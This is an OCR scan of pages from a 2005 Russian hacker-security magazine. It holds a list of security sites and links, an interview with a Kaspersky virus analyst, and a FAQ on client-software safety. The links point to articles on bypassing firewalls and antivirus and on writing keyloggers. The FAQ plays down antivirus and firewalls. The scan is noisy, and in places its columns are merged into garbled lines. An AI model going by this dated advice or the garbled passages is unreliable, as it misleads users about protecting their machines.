колы, алгоритмические 
проблемы теории чисел, ма- 
тематика разделения секре- 
та, различные шифры и 
ключи. И еще множество 
непонятных, на первый 
взгляд, терминов :). Зато 
после прочтения будешь 
знать, каковы принципы ра- 
боты различных систем 
шифрования, что общего 
между ними и какие разли- 
чия, каковы сильные и сла- 
бые стороны криптографи- 
ческих алгоритмов, что выб- 
рать для решения той или 
иной задачи. 


ПРАКТИЧЕСКАЯ 
КРИПТОГРАФИЯ 


В отличие от учебни- 

ка, это более прак- 
тичная книжка (собственно, 
отсюда и название). Практи- 
ческие правила выбора и 
использования криптогра- 
фических алгоритмов и 
функций - от блочных шиф- 
pos (DES, AES, Serpent, 
Twofish) go цифровых nog- 
писей. Способы реализации 
защищенных криптографи- 
ческих алгоритмов и систем 
на современных компьюте- 
рах. Способы снижения 
сложности системы и повы- 
шения ее безопасности с 
помощью простых интер- 
фейсов криптографических 
функций. В конце есть спи- 
сок источников информа- 
ции, так что можешь не ос- 
танавливаться только на 


прочитанном. 
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ОБЗОР САЙТОВ 


Андрей Каролик (andrusha@real.xakep.ru) 


ЧТО ПОСМОТРЕТЬ 


РЕСУРСЫ 


м Прежде 


всего стоит 


упомянуть 
лучшие ре- 
сурсы по безопасности, на 
которых полно информации 
и статей, в том числе по без- 
опасности клиентских при- 
ложений. Большинство чи- 
тателей, наверное, знают 
некоторые из приведенных 
адресов наизусть. И увы, 
количество подобных сай- 
тов не увеличивается. На- 
ходятся, конечно, энтузиас- 
ты, копирующие материалы 
и новости (порой без указа- 
ния на первоисточник) с 
этих сайтов, но дальше это- 
го дело не идет. Возможно, 
прочитав номер, ты проник- 
нешься философией без- 
опасности приложений и 
откроешь свой ресурс не 
хуже описанных: 


www.security.nnov.ru 
www.bugtraq.ru 
www.void.ru 
www.securitylab.ru 
www.xakep.ru 
www.infobez.ru 
www.securityfocus.com 
www.packetstormsecurity.nl 
www.securiteam.com 
www.uinc.ru 
http://ssz.by.ru 


Практически Ha каждом 
сайте есть разделы наподо- 
бие "Новости", "Статьи", 
"Форум" и "Полезные прог- 
раммы". Большинство сай- 
тов малоразличимы по 
структуре, но начинка зас- 
тавляет просматривать ее 
регулярно и полностью. То 
на одном хорошая статейка 
появится, то на другом ин- 
тересный аналитический 
материал проскочит. На 
этих же сайтах можно найти 
описание большинства уяз- 
вимостей и дырок, заплаток 
к ним (по крайней мере, нас- 
тавления о том, где узнать 
об этом), эксплойтов и раз- 
личных полезных утилиток. 


НАБИРАЙ И ПОЛЬЗУЙСЯ 

m Если говорить конкрет- 
но о статьях, то вот инте- 
ресные ссылки. 


www.securitylab.ru/52406.html - 
передача данных с уязви- 
мой машины в обход firewall 
через скрытый канал связи 
(как обойти брандмауэр с 
помощью специальных 
DNS-3anpocos, с примерами 
исходного кода). 

www.securitylab.ru/52842.html - 
защита с помощью SSH- 
ключей. 

www.securitylab.ru/52238,html - 


анализ встроенных меха- 


ХАКЕРСПЕЦ | 09(58)| 2005 


низмов защиты от перепол- 
нения кучи в Windows ХР 
SP2. 
www.securitylab.ru/49154.html - 
обход средств защиты кли- 
ентских приложений 
(CheckPoint VPN-1(TM) & 
FireWall-1(R) NG with 
Application, Intelligence 
R55HFAOY, Microsoft 
Windows XP SP2, Agnitum 
Outpost Pro 2.1.x, Tiny 
Firewall Pro v6.0.100, 
ZoneAlarm Pro with Web 
Filtering v4.5.594, BlackICE 
PC Protection 3.6, Kerio 
Personal Firewall 4.0, WRQ 
ATGuard v3.2v). 
www.securitylab.ru/46916.html - 
аудит брандмауэров и 
средств обнаружения втор- 
жений (105). 
www.securitylab.ru/45829.html - 
анализ злонамеренного 
программного обеспечения. 
www.securitylab.ru/45249.html - 
автоматизация управления 
патчами в Windows. 
www.securitylab.ru/44747.html - 
уязвимость в ТСР. 
www.securitylab.ru/43152.html - 
нападение на клиентские 
компьютеры. 
www.securitylab.ru/41896.html - 
прозрачные, мостиковые и 
внутренние файрволы. 
www.securitylab.ru/41723.html - 
"Безопасность домашних 


пользователей: персональ- 
ные файрволы". 
www.securitylab.ru/41660.html - 
укрепление стека ТСРЛР 
для защиты от 5У№-атак. 
www.bugtraq.ru/library/security/lu 
ka/50atlacks.him! - 50 способов 
обойти систему обнаруже- 
ния атак. 
www.security.nnov.ru/articles/fron 
tend - безопасность клиен- 
тского программного обес- 
печения. 
www.infobez.ru/article.asp?0b_no= 
3566 - идеальный спам- 
фильтр. 
www.infobez.ru/article.asp?ob_no= 
3292 - защита для домашних 
пользователей. 
www.infobez.ru/article.asp?ob_no= 
3146 - экономика DDOoS-atak. 
www.infobez.ru/article.asp?ob_no= 
2633 - дополнительные BO3- 
можности Agnitum Outpost 
Firewall Pro. 
www.infobez.ru/article.asp?ob_no= 
2688 - управление безопас- 
ностью приложений. 
www.infobez.ru/article.asp?ob_no= 
2594 - создание программы 
обеспечения безопасности 
приложений. 
www.ndis.com/papers/winpktfil- 
ter.him - способы фильтра- 
ции пакетов в Windows 
NT/9x с кучей примеров и 
передовых идей (на анг- 
лийском языке). 
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www.security.monolithosting.ru/16. 
him - "Firewall gna Windows 
собственными руками" 
(статья раскрывает сокро- 
венную кухню работы 
брандмауэра). 

www.xakep,ru/post/27264 - за- 
щита WebMoney. 

www.uinc.ru/articles/45 - анали- 
заторы кода в антивирусах. 

www.uinc,ru/articles/10 - "3a- 
щити себя от вторжения, 
или что не надо делать". 

www.uinc.ru/articles/32 - при- 
мер взлома программ, защи- 
щенных с помощью крипто- 
алгоритма МО5. 


www.uinc.ru/articles/30 - взлом 
программ, защищенных с 
помощью криптоалгоритма 
Blowfish. 

www.uinc.ru/articles/tl - как 
обойти AVP. 

www.uinc.ru/articles/38 - про- 
цессы в Windows. 

www.uinc.ru/articles/26 - перех- 
ват вызовов функций. 

www.uinc.ru/articles/24 - пишем 
PROXY-SERVER. 

www.uinc.ru/articles/19 - внед- 
рение DLL с помощью лову- 


шек. 


www.uinc.ru/articles/zametki/OOL.s 
html - "Кейлоггер? Это npoc- 
то!". 

www.uinc.ru/articles/zamet- 
ki/003.shtm| - по какому прин- 
ципу работают Анти- 
Сниферы. 


КАЧАЙ И ПОЛЬЗУЙСЯ 
и И несколько полезных 
утилиток. 


www.ptsecurity.ru - отличная 
утилита XSpider для автома- 
тизированного поиска уяз- 
вимостей, в том числе при- 
годная для тестирования 
брандмауэров (демонстра- 
ционная версия без суще- 
ственных функциональных 
ограничений распространя- 
ется на бесплатной основе). 
www.firewallleaktester.com - 
большая коллекция утилит, 
предназначенных для обхо- 
да брандмауэров, и сводная 
таблица с результатами тес- 
тирования (на английском 
языке). 
http://afick.sourceforge.net - 
утилита Afick, помогающая 
при обнаружении вторже- 
ний, а также позволяющая 
контролировать общую це- 
лостность системы (доступ- 
на для большинства плат- 
форм как в двоичном, так и 
в исходном форматах). О 
ней есть и отдельная ста- 
тейка - 
www.securitylab.ru/43875.html. 
www.security.nnov.ru/soft/3proxy - 
многоплатформенный Ha- 
бор прокси-серверов (nog 
Win32 и Unix). 
www.security.nnov.ru/soft/rkde- 
tect - утилита RKDetect gna 
обнаружения системных 
служб, скрытых rootkits 
уровня пользователя. 
www.security.nnov.ru/soft/srunas - 
утилита для защиты адми- 
нистративных учетных за- 
писей при работе на клиен- 
тских машинах от кражи па- 
ролей с помощью кейлог- 
геров. 
www.xakep.ru/post/27569 - ути- 
лита удаленного админист- 
рирования платформ 
Windows 95/98/2000/ХР. 
www.scaramanga.co.uk/fwmon - 
Firewall Monitor (fwmon), Mo- 
нитор для анализа в реаль- 
ном времени событий (втор- 
жений, атак ит.д.) встроен- 
ного файрвола Linux 
(ipchains/iptables). 
www.pcinternetpatrol.com/down- 
loads/audit.php - маленькая 
утилита для тестирования 
защиты компьютера. 
http://spybot.eon.net.au - 
Spybot-Search&Destroy, 


программа для обнаруже- 
ния и удаления из системы 
"шпионских" модулей. 
www.rwtemple.com/software/Http 
Spy - для мониторинга и пе- 
рехвата http-Tpacpuka в ре- 
альном времени 
http://erwan.l.free.fr - 1Р-сни- 
фер (с множеством встро- 
енных утилит). 
www.sysinternals.com/ntw2k/sour 
ce/tepview.shtml - детализиро- 
ванный отчет об активных в 
данный момент ТСР- и UDP- 
соединениях, а также о при- 
ложениях, создавших эти 
соединения. 
http://mcdev.com/programs.php?p 
age=NoMess - утилита отклю- 
чения Windows Messenger 
Service, который часто ис- 
пользуется для проникно- 
вения на компьютер. 
www.lvilord.de/4226fix/4226fix.ht 
п - стремясь нейтрализо- 
вать вирусно-червячные 
эпидемии, Microsoft во вто- 
ром SP для Windows ХР 
внесла ограничение ТСРЛР- 
соединений на один про- 
цесс (максимум десять), что 
не есть хорошо при скачи- 
вании файлов через сети 
общих ресурсов (eDonkey, 
Bittorrent, Gnutella и т.п.). 
Этот патч позволяет увели- 
чить в Windows ХР SP2 чис- 
ло ТСР/ЛР-соединений gna 
одного процесса до 50-ти. 
http://nettime.sourceforge.net - 
программа для синхрониза- 
ции времени с серверами 
точного времени. 
www.chiark.greenend.org.uk/~sgta 
tham/putty - многоплатфор- 
менный Telnet/SSH-KnneHT 
с возможностью эмуляции 
ж{егт-терминала. 


А если что-то ищешь и не 
можешь найти, не забывай 
о форумах, в которых мно- 
гое можно узнать быстро и 
без напряга. Как говорят, 
одна голова хорошо... 


И бегом на 
www.microsoft.com/rus/windows 
закрывать свои дыры! Когда 
ты там был в последний раз? 
Твоя операционка давно как 
дуршлаг :)? А ты все наде- 
ешься на чудо и думаешь, 
что обойдется. Ничего подоб- 
ного. Либо ты сам себя обе- 
зопасишь, либо ты рано или 
поздно пожалеешь о том, 
что ничего не предпринял 
раньше. Подробнее читай на 
http://update.microsoft.com/win- 
dowsupdate/v6/about.aspx?In=ru. 
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ИНТЕРВЬЮ С ДЕВУШКОЙ ВИРУСНЫМ АНАЛИТИКОМ 
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Дело в том, ка/биология для любозна- тать соответствующее маться мышлениеформиру- 
что она за- тельных" и починку (иногда мышление) и послужить ющей базой (математикой, 
нимается ви- наоборот) бытовой мелочи первичным курсом и серти- физикой) осталась, а де- 
русным ана- вроде телефонов. фикатом социальной адек- лать это самостоятельно 
лизом в са- Компьютер просто предс- ватности. Если этого не по- несколько сложнее, чем 


мом хардкорном смысле 
этого слова. Ежедневно ей 
приходится анализировать 
и обезвреживать такое ко- 
личество вредоносного 
софта, какое многие из нас, 
наверное, не увидят за всю 
свою жизнь. Дизассембли- 
рование, понимание функ- 
ционирования операцион- 
ных систем, различные про- 
цессорные архитектуры, по- 
лиморефные механизмы, ме- 
тодики заражения, трояны, 
низкоуровневое программи- 
рование, reverse enginee- 
ring u T.g. - все это для нее 
не пустые слова, а такая же 
повседневная реальность, 
как твой утренний кофе. 


XS: Представься, сколько 
тебе лет (приблизительно ;)) 
и, вкратце, чем сейчас зани- 
маешься? 

А: Алиса Шевченко, 21 
год, вирусный аналитик 
"Лаборатории Касперско- 
го", reverse engineering в 
контексте компьютерной 
вирусологии. 


XS: Чем был обусловлен 
выбор твоей сегодняшней 
профессии, кем хотела 
стать в детстве? 

A: Строила домики из 
конструктора и мечтала 
быть космонавтом. К пос- 
леднему пункту, возможно, 
причастен Кир Булычев 
(имеются в виду "Приклю- 
чения Алисы" - прим. peg.). 

Мне было интересно, как 
все устроено на самом низ- 
ком уровне и как оно рабо- 
тает. Изначально это выли- 
валось в поглощение кни- 
жек типа "химия/физи- 


ХАКЕРСПЕЦ 09(58)| 2005 


тавляет собой достаточно 
широкий канал, в который 
можно спускать подобную 
исследовательскую энер- 
гию. Поэтому когда в пери- 
Og моего дошкольного воз- 
раста папа начал занимать- 
ся компьютерами, они попа- 
ли и в мое поле зрения - 
дальнейшее развитие в эту 
сторону плавно складыва- 
лось само собой. К ассемб- 
леру и reverse engineering'y 
я пришла годам к 15-ти и со 
всей мощью юношеского 
максимализма возмечтала 
связать с этим занятием бу- 
дущую профессиональную 
деятельность. То есть это 
просто детская мечта сбы- 
лась, я, вроде как, ни при 
чем :). В соответствии с про- 
рочествами школьных учи- 
телей, мне светила карьера 
гуманитария-писателя и 
лингвиста. 


XS: Где училась, работа- 
ла, прежде чем прийти в ан- 
тивирусную контору? Что 
дало самый значительный 
вклад в твою профессию - 
вуз, самообучение etc.? 

A: Tonbko самообучение. 
IT-o6nacTb чересчур дина- 
мична, поэтому ее невоз- 
можно качественно провес- 
ти через инертную систему 
академического образова- 
ния. В условиях подобной 
динамичности оригинальная 
цель ВО - предоставить че- 
ловеку необходимые в ра- 
боте знания и навыки - от- 
части профанируется, сво- 
дясь к немного другим ве- 
щам: научить учиться, наст- 
роить голову для работы в 
нужной области (вырабо- 


нимать, то не избежать раз- 
очарования: "То, чему нас 
учат, никому не нужно". Как 
и произошло у меня. Два 
раза. На момент первого 
поступления в университет 
на "компьютерную специ- 
альность" я уже давно зна- 
ла ассемблер, и ощущение 
бесполезности паскалевс- 
ко-бумажной волокиты 
вскоре возросло go такой 
степени, что утешаться не- 
обходимостью базовых зна- 
ний стало невозможно. По- 
том была еще одна попытка 
учебы - уже в петербур- 
гском вузе, откуда я и сбе- 
жала в Лабораторию. 
Образование я буду про- 
должать. На этот раз в сто- 
рону академической мате- 
матики (то есть туда, где ми- 
нимизированы компьютер- 
но-прикладнические поту- 
ги). Не для корочки и даже 
не из соображений соци- 
альной адекватности, а по- 
тому что потребность зани- 


изучать прикладные облас- 
ти IT. Хотя бы потому, что в 
данном случае теория не 
проявляет себя в практике 
непосредственно, и всегда 
есть соблазн отлынивать 
под предлогом "это никому 
не нужно". 

Работала go KL, не считая 
подработок и самодеятель- 
ности, в технической подде- 
ржке питерского провайде- 
ра, эникейщиком, официан- 
ткой (последнее - в период 
увлечения Кастанедой, в 
качестве спецоперации по 
купированию Чувства 
Собственной Важности (на- 
90 было идти санитаркой в 
неврологию: это эффектив- 
нее :) - прим. Лозовского). 


XS: Помнишь ли свой пер- 
вый компьютер? Когда он у 
тебя появился, что была за 
машина? 

A: Не очень помню. Мне 
тогда было 12 лет, я прочи- 
тала книжку "Бейсик для 


начинающих" и первым ge- 
лом занялась поиском того 
места в компьютере, в кото- 
рое нужно вставлять прог- 
раммы на бейсике, чтобы 
они исполнялись. 


Какие книги, интер- 
нет-порталы, другие источ- 
ники можешь назвать осно- 
вополагающими в твоем, 
как специалиста, развитии? 

А:Было очень много 
электронной документации, 
tutorial'oB и статей, автор- 
ство которых вспоминать 
сейчас бесполезно. Вот 
есть книжка "Ассемблер 
для IBM РС" Финогенова. 
Ее помню, потому что она 


АНТИВИРУСНАЯ К Я 


бумажная и стоит сейчас на 
полке в качестве напомина- 
ния о том, как все начина- 
лось. Еще большую роль 
сыграла Fidonet - эха 
ru.hacker.dummy, в которой 
меня постоянно принимали 
за мальчика, несмотря на 
женское имя: "Ну, есть же 
такой - Айсе Соорег". Это к 
вопросу о стереотипах и 
том, как они фильтруют 
входящий поток и форми- 
руют результирующую кар- 
тинку. 


Какую ОС и для како- 
го спектра задач предпочи- 
таешь использовать? 

A: Сейчас только всякий 
Windows. 2000/XP, обыч- 
ный стандартный выбор. 
Позволяет решать весь 
спектр задач. А на случай, 
когда не позволяет, есть 
MSYS (mingw - прим.ред.) и 
Vmware. 

С живым Unix'om обща- 
лась в последний раз года 
два назад - на сервере об- 
щажной локалки. С тех вре- 
мен осталось неискорени- 
мое typo - писать в win- 
dows-koHconn ifconfig вмес- 
To ipconfig. 


Твое отношение к Xa- 
керству, крэкерству, виру- 
сописательству? 

A: He могу ответить: воп- 
рос размытый. 

Вот "хакерство" - это та- 
кое общее место, которое 
от случая к случаю и в за- 
висимости от интереса гово- 
рящего может подразуме- 
вать "кражу секретных дан- 
ных в корыстных целях", 
либо "глубокое исследова- 
ние компьютерных (необя- 
зательно) объектов с целью 
(необязательной) нахожде- 
ния уязвимостей в них", ли- 
бо "внедрение в чужие 
компьютеры", либо еще 
что-то. То есть у меня иног- 
да бывает мнение по поводу 
конкретных мотивов конк- 
ретных людей в конкретных 
ситуациях, а по поводу 
обобщающих терминов у 
меня мнения нет. 


Интересовалась ли 
деятельностью каких либо 
xak/security-rpynn (была ли 
в их составе), просто авто- 
ритетов в области IT-securi- 
ty? Можно ли сказать, что 
они оказали на тебя 
влияние? 

А:Никто особенно не ока- 
зал, я, в среднем, сама по 


себе и тихим ходом. Однаж- у 
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ды стадный инстинкт таки 
загнал меня в классичес- 
кую буржуйскую крэк-груп- 
пу, но мне быстро стало по- 
нятно, что reverse engineer- 
ing, поставленный на поток, - 
это уже He Challenge, а ре- 
месло, рутина и несвобода, 
а это можно терпеть разве 
что в условиях хорошей ма- 
териальной компенсации и 
отсутствия выгодной аль- 
тернативы. Заскучала и 
сбежала. Бывает по-друго- 
му, но потом уже пропал ин- 
терес кучковаться. 


XS: Почему твоим cerog- 
няшним местом работы яв- 
ляется именно антивирус- 
ная компания? 

А:Область, ограниченная 
низкоуровневым програм- 
мированием и дебаггерами- 
декомпиляторами, достаточ- 
но узкая: либо антивирус- 


Ш Эвристические детекторы, дешифровщики, распаковщики и прочие испол- 
няемые модули, входящие в состав антивирусных баз, пишутся специальным 
образом, что позволяет им быть слинкованными и запущенными под любой 
платформой (операционной системой) на данной архитектуре. Такие исполня- 


емые модули называются "линками". Один и тот же линк должен одинаково 
успешно линковаться, запускаться и работать как под MS Windows, так и под 
Linux.x86, FreeBSD.x86 и т.д. Написание линков требует от вирусного анали- 
тика досконально понимать функционирование данной архитектуры ЭВМ. 


ная индустрия, либо защита 
софта. Антивирусная инду- 
стрия представлена в Рос- 
сии всего двумя более-ме- 
нее значительными компа- 
ниями. Дальше все на уров- 
не "так получилось". 


XS: Что бы ты ответила 
человеку, считающему, что 
область IT-security - удел 
исключительно мужчин? 
Думаешь ли ты, что сегодня 
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многие женщины реализу- 
ют свой интерес и призва- 
ние и способны профессио- 
нально вырасти, если при- 
дут работать в эту область? 
Или ты считаешь, что таких 
немного, а большинство из 
имеющихся просто отдают 
дань моде? 

А:Ничего бы не ответила, 
потому что отвечать на 
один и тот же вопрос в те- 
чение шести лет изрядно 
надоело :). В настоящий мо- 
мент мне уже сложно сори- 
ентироваться и понять, о 
чем вообще все это, потому 
что не видно проблемы, а 
виден лишь пустотный спор 
про обобщения-мировоз- 
зрения. Ведь очевидно же, 
что, с одной стороны, сте- 
реотипы всегда основаны 
на некой объективной ста- 
тистике, а с другой - всегда 
покрывают не весь, а лишь 
самый широкий, "средний" 
слой объектов. Примени- 
тельно к обсуждаемому 
вопросу это означает, что 
да, есть такое устройство 
мозгов, с которым хорошо 
сочетаются определенные 
компьютерные занятия, а 
есть другое устройство, с 
которым они сочетаются 
плохо, и распределение 
этих двух устройств в соот- 
ветствии с физическим по- 
лом оказалось в известной 
степени неравномерным. Но 
неравномерность распреде- 
ления - недостаточное ус- 
ловие для выведения при- 
чинно-следственной зави- 
симости между определен- 
ным устройством мозгов и 
физическим полом как та- 
KOBbIM. 

Женщины в IT, безуслов- 
но, есть, они растут и реа- 
лизуются - это вроде как 
уже известный факт. Я во- 
обще считаю, что програм- 
мирование in general - по 
многим параметрам очень 
"женская" профессия, но 
не хочется углубляться в 
доказательства и анализ 
всего этого, поскольку вый- 
дет массивный трактат "тор- 


жество умозрительности", а 
аудитория в ужасе разбе- 
жится. 


XS; Много ли у тебя nog- 
pyr с аналогичным профи- 
лем деятельности? 

A: Hv одной. Скорее всего, 
это издержка узости данной 
профессиональной области 
(то есть тому проценту, ко- 
торый в среднем по IT-06- 
ласти представлен женщи- 
нами, тут просто негде раз- 
вернуться). 


XS: Каков спектр твоих 
задач в работе? Тяжело ли 
реверсить вирусы и писать 
линки? Как часто и в каком 
темпе приходится занимать- 
ся этим? 

A: Есть входящий поток 
различных компьютерных 
объектов неизвестного ха- 
рактера (программы, скрип- 
ты, офисные документы, 
НТМЕ-документы - все, что 
хотя бы в теории заведомо 
вредоносно). Базовая зада- 
ча состоит в том, чтобы эти 
объекты анализировать, ло- 
кализовать вредный код 
(если он есть) и соответ- 
ствующим образом обнов- 
лять антивирусные базы. 
Если объект - это файло- 
вый вирус, то нужно писать 
отдельный "модуль" лече- 
ния. Если объект зашифро- 
ван или полиморфен, то пи- 
сать дешифровщик/пар- 
сер/трассер. Также прихо- 
дится заниматься вирусны- 
ми описаниями для Энцик- 
лопедии (/////. М Ги5 ГИ), ge- 
лать аналитические статьи 
для сайта, веблог 
(www.kaspersky.ru/weblog), са- 
мой писать недостающие 
утилиты для внутреннего 
использования. 

Тяжело или нет - вопрос 
субъективный, и он завязан 
на личном интересе, так что 
ответ тут очевиден. 


XS: Сколько времени про- 
водишь за монитором на 
работе и дома? 


Ш Знания вирусного аналитика довольно специфичны: они должны быть ши- 
рокими и глубокими одновременно. Широкими - настолько, чтобы охватывать 
максимальное количество форматов файлов, архитектур и специфик опера- 
ционных систем, языков программирования, сетевых протоколов. Глубокими ь 


настолько, чтобы хорошо представлять себе внутреннюю низкоуровневую 
"кухню" компьютера, без чего не обойтись, когда нужно детально проанали- 
зировать дизассемблированную программу (особенно если она написана с ис- 
пользованием нестандартных/недокументированных приемов или с намере- 
нием затруднить ее анализ). 


A: Kak минимум, 8 часов 
на работе плюс 1-6 дома. 


XS: Какие современные 
сайты удостаиваются чести 
попасть в boomarks девуш- 
ки вирусного аналитика? 

А:Всякое разное, что зап- 
ланировано на "потом почи- 
тать". Остальное либо запо- 
минается в голове, либо на- 
ходится через Google. 

Наиболее полезные сайты 
из числа профильных: 
www.wasm.ru, www.wotsit.org, 
isc.sans.org. 


XS: Чем увлекаешь- 
ся/развлекаешься - из об- 
ластей, не имеющих ника- 
кого отношения к IT-TeXHO- 
nornam? 

A: Bce по-прежнему: инте- 
ресуют механизмы явлений. 
Особенно в контексте "че- 
ловек/социум/мир", то есть 
психология, биология, рели- 
гия, эзотерика, лингвистика, 
если общими словами пере- 
числять. Вообще же четких 
разграничений по областям 
и интересам нет: жизнь пос- 
тоянно задает вопросы и 
ставит задачи, а поиски от- 
ветов/решений выносят в 
какую-то конкретную об- 
ласть, которая на время ув- 
лекает. В настоящий момент 
актуальны йога, астрология 


Worm.Win32.Nople, в отличие от собратьев, очень ярко 
демонстрирует свое присутствие в системе 


и теория/история криптог- 
рафии. 

В роли развлечений - если 
под развлечениями пони- 
мать занятия, при которых 
голова более или менее вы- 
ключена - обычно выступа- 
ют пробежки, художествен- 
ные книжки и кино, одобрен- 
ные как минимум 23-мя не- 
зависимыми авторитетными 
личностями. Туда же - 
эксплуатация стершихся ро- 
ликов и дружеского скутера. 
Отдельно - живое общение с 
различными любимыми че- 
ловеками. Обычное дело. 


XS; Отражается ли твоя 
профессия, несколько экзо- 
тичная с точки зрения мно- 
гих окружающих, на обще- 
нии и восприятии ими же? 

A: Отражается. Но тут иг- 
рает роль не столько сама 
профессия, сколько фунда- 
ментальное свойство голо- 
вы самозатачиваться под 
основную производимую 
ею работу, вплоть до рас- 
пространения терминологи- 
ческого/понятийного поля 
узкой "рабочей" области на 
широкое пространство "ре- 
ального мира". То есть: вот 
одному программисту (java) 
в периоды авралов снится, 
что он "дерево", и некото- 
рые его "листья" прибирает 


явовый GarbageCollector, и 
он говорит, что когда все 
больше и больше твоих 
указателей ссылаются на 
NULL - это щекотно. 

Вот на таком уровне. При- 
мер клинический, зато вы- 
пуклый. 


XS: Какие этапы своего 
профессионального пути 
можешь назвать достиже- 
НИЯМиИ? 

A: Не знаю: когда путь само- 
ценен как процесс, смысл по- 
нятия "достижение" теряется. 

Ну, может быть, анализ 
первого в мире вируса (file 
infector) для портативных 
устройств nog WinCE 
(Virus.WinCE.Duts.a - прим. 
peg.). Была середина ночи, 
я не знала ни АРМ-ассемб- 
лера, ни целевой операци- 
онки, а разобраться нужно 
было как можно быстрее. 


Это был отличный Challenge. 


Потом были аналогичные 
ситуации с другими "первы- 
ми" мобильными вирусами 
(под Symbian в том числе), 
но когда пути хоженые, уже 
не так интересно. 


XS: Каким ты видишь бу- 
дущее своей профессио- 
нальной области и личное 
будущее? 

'А:Профессиональной об- 
ласти по меньшей мере нич- 


Win32.HLLC.Sulpex. 


Очень вежливый 
Virus.WinCE.Duts.a. Кнопка 
МО, как ни странно, функ- 
ционирует 


то не угрожает, кроме рас- 
ширения и интеграции с 
другими направлениями IT- 
security. Не хочется строить 
прогнозы судьбы области, в 
которой я работаю: будущее 
и так к ней придет, без меня 
и нас. Что касается меня, 
есть некий список тропинок, 
которые хочется пройти, и 
тропинки не связаны с акту- 
альной профессиональной 
областью. Есть подозрение, 
что я скоро уйду из IT - HaB- 
сегда или на время, сбалан- 
сировать голову (то есть пе- 
рестать видеть сны про то, 
как твои указатели ссыла- 
ются Ha NULL). 


XS: И под конец скажи 
что-нибудь для тех наших 
читательниц, которых сте- 
реотипы заставляют сомне- 
ваться на этапе вступления 
в профессиональную об- 
ласть Т-зесигКу. 

A: TyT просто: если об- 
ласть действительно инте- 
ресует, если это не образ 
или престиж, перед вступ- 
лением в нее ничто не оста- 
новит, тем более такой нор- 
мальный социальный объ- 
ект, как стереотип. 

Да, сложновато бывает. Те, 
кому не удается этот конф- 
ликт в себе разрешить, могут 
утешаться следующим обра- 
зом: любой отдельно взятый 
носитель стереотипов об IT- 
женщинах, если только он не 
совсем биоробот, всегда мо- 
жет сделать исключение 
персонально для Вас. 
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Долгое время на этот 
вопрос отвечали без- 
апелляционно: нет, не- 
возможно. Интернет - 
это совокупность ог- 
ромного количества 
разнородных узлов, ра- 
ботающих под управ- 
лением различных опе- 
рационных систем. 
Каждая содержит 
"свои" уязвимости, за- 
тыкаемые по мере вы- 
хода заплаток, и поэто- 
му написать универ- 
сальный крэкер интер- 


нета практически нере- 
ально. К тому же крэ- 
кер будет очень недол- 
говечным, так как од- 
нажды найденные ды- 
ры быстро устаревают. 
Но рубеж ХХ-ХХ! веков 
изменил это положе- 
ние дел! Альтернатив- 
ные операционные сис- 
темы неуклонно выми- 
рают, и интернет стре- 
мительно вырождается 
в сеть Windows-MaLluin, 
обслуживаемых раз- 
личными "орангутанга- 
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ми", которые заплатки 
не устанавливают года- 
ми. Они работают как 
на клиентских станци- 
ях, так и на серверах. 
Взлом интернета - уже 
не сказка, а реаль- 
ность :). 


Очень опасно! Клиен- 
тское программное 
обеспечение дыряво 
go чрезвычайности, а в 
Сети бродят злобные 
хакеры и водятся аг- 
рессивно настроенные 
черви, которые атаку- 
ют все на своем пути. И 
хотя большинство из 
них не делает ничего 
(только транжирит се- 


тевой трафик и перио- 
дически роняет 
Windows), нередки слу- 
чаи уничтожения или 
утечки данных. В осо- 
бенности это относится 
к интернет-паролям, 
электронным кошель- 
кам, конфиденциаль- 
ной информации и T.g. 
Еще воруют ICQ-Home- 
ра, идентификаторы 
сетевых игр, содержи- 
мое адресной книги 
(оно представляет ог- 
ромный интерес для 
спамеров) и вообще 
все что угодно. Иногда 


ПО ВЗЛОМУ КЛИЕНТСКИХ ПРИЛОЖЕНИЙ 
И БЕЗОПАСНОСТИ СЕТЕВЫХ ПРОТОКОЛОВ 


руками захваченного 
компьютера осущес- 
твляют удаленную ата- 
ку, например направля- 
ют шторм SYN-nakeToB 
на правительственный 
сервер. Вот и попробуй 
доказать, что это не ты 
злодей и тебя nog- 
ставили :). 


Регулярно, не реже og- 
ного раза в неделю, 
скачивать заплатки 
для всех установлен- 
ных приложений (а не 
только Windows 
Update). Ошибки обна- 
руживаются не только 
в продукции Microsoft: 
они встречаются и в 
Лисе, и в Ocne, и в ICQ, 
и многих других клиен- 


тах. Также ни в коем 


случае нельзя откры- 
вать вложения, не убе- 
дившись в "честности" 
их расширения. Лучше 
предварительно сохра- 
нять вложения на диск 
и оттуда действовать 
уже ГАК'ом - он не 
подведет. А обмануть 
стандартный "Провод- 
ник" очень легко. 


При регулярной уста- 
новке свежих заплаток 


вероятность подцепить 
сетевой червь практи- 
чески нулевая. Легко 
можно запустить инфи- 
цированный ехе-файл, 
поэтому скачивать 
файлы с подозритель- 
ных источников недо- 
пустимо. Теоретически 
полученный файл мож- 
но пропустить через 
антивирус, но здесь 
есть одно "но". Круп- 
ные компании "стери- 
лизуют" все програм- 
мное обеспечение са- 
мостоятельно, поэтому 
за его чистоту можно 
не опасаться, а разные 
отстойники с крэкну- 
тым варезом вполне 
могут подложить 


"свинью", заразив 
файл слегка модифи- 
цированным вирусом, и 
никакой AV ero не 
возьмет! К тому же ан- 
тивирусы отнимают go- 
вольно много систем- 
ных ресурсов, а посто- 
янные обновления баз 
жрут трасрик, так что 
выгода от их использо- 
вания довольно сомни- 
тельна. 


Брандмауэр сам по ce- 
бе еще ни от чего не 
защищает. И на ПК он, 
в общем, не слишком- 
то нужен. Да, он может 
закрыть уязвимые пор- 
ты, но более эфофек- 
тивной мерой будет ре- 
гулярная установка 
заплаток. Персональ- 
ный брандмауэр - это 
удобное средство для 
наблюдения за легаль- 
ными приложениями: 
какое из них ломится в 
Сеть, что и куда оно 
пытается передать. Но 
специальным образом 
спроектированная 
программа может про- 
бить брандмауэр как 
снаружи, так и изнутри. 
Он даже хрюкнуть не 
успеет! Брандмауэр - 
это инструмент для 
профессионалов, раз- 
бирающихся в ТСРЛР- 


протоколах и умеющих 
читать "сырые" двоич- 
ные логи. С настройка- 
ми по умолчанию это 
просто красивая иг- 
рушка, которая опять- 
таки жрет ресурсы, 
иногда обрушивает 
Windows, конфликтует 
с некоторыми приложе- 
ниями и уменьшает 
трафик. Брандмауэры 
и антивирусы приносят 
пользователю чувство 
ложного спокойствия: 
жертва расслабляется, 
забывает об обновле- 
ниях, и вот тут-то хакер 
наносит свой удар :). 


Упаегодгоипа-сайты (к 
ним относятся и порно, 
и варез) делятся на 
две категории. Первая - 
это честные сайты, ве- 
дущие свой маленький 
бизнес, посещать кото- 
рые неопасно, даже ес- 
ли там выложено изв- 
ращенное садо-мазо в 
стиле "Кега верхом на 


